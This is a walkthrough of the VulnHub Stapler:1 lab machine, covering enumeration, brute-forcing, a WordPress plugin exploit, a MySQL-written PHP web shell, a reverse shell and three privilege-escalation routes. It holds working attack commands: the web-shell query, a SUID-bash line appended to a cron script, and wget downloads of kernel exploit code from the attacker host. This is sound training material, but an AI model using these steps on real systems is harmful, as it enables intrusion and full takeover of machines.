VulnHub: STAPLER: 1

Link: https://www.vulnhub.com/entry/stapler-1,150/

Initial foothold

1. Network discovery

nmap -sn 10.0.2.32/24

My target is 10.0.2.31.

2. Port scan

nmap -Pn 10.0.2.31
nmap -Pn -p1000- 10.0.2.31

3. OS and service scan

nmap -A -p20,21,22,53,80,139,666,3306,12380 10.0.2.31

There’re services as listed:

• port 21 vsftpd w/ anonymous login
• port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
• port 53 dnsmasq 2.75
• port 80 PHP cli server 5.5 or later
• port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
• port 666 doom
• port 3306 MySQL 5.7.12–0ubuntu1
• port 12380 Apache httpd 2.4.18 ((Ubuntu))

4. Vuln scan

nmap --script vuln -p20,21,22,53,80,139,666,3306,12380 10.0.2.31

Initial enumeration/searching existing exploits of each service

• port 21 vsftpd 3.0.3 w/ anonymous login

There aren’t any public exploits that I can use.

Login w/ anonymous

ftp 10.0.2.31
username: anonymous

List files

ls -la

Download it

get note

Read it

cat note

Elly has FTP account.

• port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

ssh 10.0.2.31

There’s a banner.

• port 53 dnsmasq 2.75

Reverse lookup

dig -x 10.0.2.31 @10.0.2.31

Nothing

• port 80 PHP cli server 5.5 or later

Nikto

nikto -h http://10.0.2.31

There’re ‘.bashrc’ and ‘.profile’.

Download ‘.bashrc’ and ‘.profile’. and read them

wget http://10.0.2.31/.bashrc
wget http://10.0.2.31/.profile

cat .bashrc

Nothing

cat .profile

Further directory enumeration

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.31/ -x php,txt,html,sh,cgi -q

Nothing

• port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)

I googled the existing exploit and there’s a sambacry, but I need to have a credential. I’ll leave this for a while.

opsxcq/exploit-CVE-2017-7494

Enumeration

nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.31

I can access \kathy and \tmp.

enum4linux -a 10.0.2.31 > enum4linux.txt

Read the file, I got usernames.

Save them as users.txt

Connect accessible directory, /kathy

smbclient //10.0.2.31/kathy
dir

cd kathy_stuff
dir
get to_do-list.txt

cd ../backup
get vsftpd.conf
get wordpress-4.tar.gz

Read file

cat todo-list.txt

cat vsftpd.conf

Unzip WordPress and read its configuration file

tar -xzvf wordpress-4.tar.gz
cd wordpress
find . -name '*.php' | grep config
cat ./wp-config-sample.php

Nothing

• port 666 doom

nc -nv 10.0.2.31 666

There’s a file.

Connect and retrieve the file

nc -nv 10.0.2.31 666 > message.jpg
ls -la

Read file’s metadata

exiftool message.jpg

It’s a zip file.

Unzip it

unzip message.jpg

Open it.

Connect another accessible directory, /tmp

smbclient //10.0.2.31/tmp

It’s a program called ‘ls’, not much useful.

• port 3306 MySQL 5.7.12–0ubuntu1

I cannot access this right now.

• port 12380 Apache httpd 2.4.18 ((Ubuntu))

Nikto

nikto -h http://10.0.2.31:12380

It’s an HTTPS site.

Nikto again

nikto -h https://10.0.2.31:12380

Directory enumeration

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.0.2.31:12380/ -x php,txt,html,sh,cgi -q -k

Access the site

Access /admin112233/

Access /blogblog/

Read through every post.

Scan WordPress

wpscan --url https://10.0.2.31:12380/blogblog/ -et -ep -eu --disable-tls-checks

There’s a list of users.

save as ‘users_wp.txt’

Scan for plugin

wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks --plugins-detection aggressive

I googled and came across this exploit code of ‘advanced-video-embed-videos-or-playlists’.

gtech/39646

Read the script and edit it to match the target.

Exploitation

1. FTP Port 21 — brute-forcing
2. SSH Port 22 — brute-forcing
3. HTTP(S) Port 12380 — brute-forcing and public exploit

Start w/ FTP Port 21 — brute-forcing

I will use users.txt as username and password because some people use the same string to be username and password.

hydra -L users.txt -P users.txt ftp://10.0.2.31

I got the credential.

ftp 10.0.2.31
username: SHayslett
password: SHayslett
ls -la

Not much use right now

Next is SSH Port 22 — brute-forcing

hydra -L users.txt -P users.txt 10.0.2.31 ssh -t 4 -u -F -V

Connect

ssh SHayslett@10.0.2.31

Now, I got the shell.

Last one, HTTP(S) Port 12380 — brute-forcing and public exploit

Starting w/ brute-forcing and leave it for a while.

wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks -P ~/Desktop/rockyou.txt

Using public exploit

python 39646.py

Now I got a MySQL credential.

4. MySQL port 3306

Remote login w/ root : plbkac

mysql -h 10.0.2.31 -uroot -pplbkac

I’ll create an outfile w/ the content of PHP shell command.

Normally, I’ll store the shell file within the Wordpress site. So, the path probably is:

/var/www/https/blogblog/wp-content/uploads/

I’ll use MySQL command to create PHP shell.

use mysql
Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile   "/var/www/https/blogblog/wp-content/uploads/shell.php";

Verify if the file exists.

Intercept the request w/ Burp Suite and send it to the repeater

Add ‘?cmd=id’ to test the shell function.

Prepare listener on port 443

rlwrap nc -lvp 443

I’ll supply a reverse shell command to the generated shell using this cheatsheet:

Reverse Shell Cheat Sheet

Encode to URL w/ Burp Suite’s decoder.

Supply encoded reverse shell command w/ repeater.

After many tries, I succeeded w/ this command.

Back to the listener, now I got the shell.

Privilege Escalation

I’ll continue w/ WordPress shell.

Get TTY shell

python -c ‘import pty;pty.spawn(“/bin/bash”);’

1. Explore directory as listed

/opt
/tmp
/var/log
/var/www/https/
/var/mail

I came across this /var/mail/www-data. There’s a PHP-mailer, but I don't know how to exploit it. Let’s skip this for a moment.

2. LinEnum.sh

Prepare attacker machine to be file server

python -m SimpleHTTPServer 80

Download, store in /tmp, change permission, and run

cd /tmp
wget http://10.0.2.32/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

These are information that I’ve found interesting.

Kernel version 4.4.0

User that can run sudo, peter

Cronjob located in ‘/etc/cron.d’

Running service, ‘cron -f’ indicating there’s running cronjob.

There’s a password in ‘.bash_history’

3. Exploit

• Login as peter and verify sudo

From LinEnum.sh result

su peter
Password: JZQuyIN5

Verify sudo

sudo -l

Change to root

sudo su
whoami

Now, I’m root.

• cronjob

From LinEnum.sh result

I will verify the path of these services

cat /etc/cron.d/logrotate

There’s ‘.sh’ script.

Verify permission

ls -la /usr/local/sbin/cron-logrotate.sh

It’s owned by root and can be edited by anyone.

Read its content

cat /usr/local/sbin/cron-logrotate.sh

Append the command to get a root shell and verify

echo "cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash" >> /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh

Wait for a while and verify /tmp

ls -la

Now, I got rootbash

Run it

/tmp/rootbash -p

• kernel exploitation

Verify kernel version

uname -a

This machine is Linux kernel 4.4.0 32 bit.

Search w/ searchsploit

searchsploit linux kernel 4.4

After many tries, I succeeded w/ this exploit.

Copy and read it

searchsploit -m 39772
cat 39772.txt

I followed the provided link.

808 - project-zero - Project Zero - Monorail

I got the exploit file.

Decompressed

tar -xvf exploit.tar

Download to target machine.

wget http:/10.0.2.32/hello.c
wget http:/10.0.2.32/suidhelper.c
wget http:/10.0.2.32/doubleput.c
wget http:/10.0.2.32/compile.sh
./compile.sh

Now, I’m root.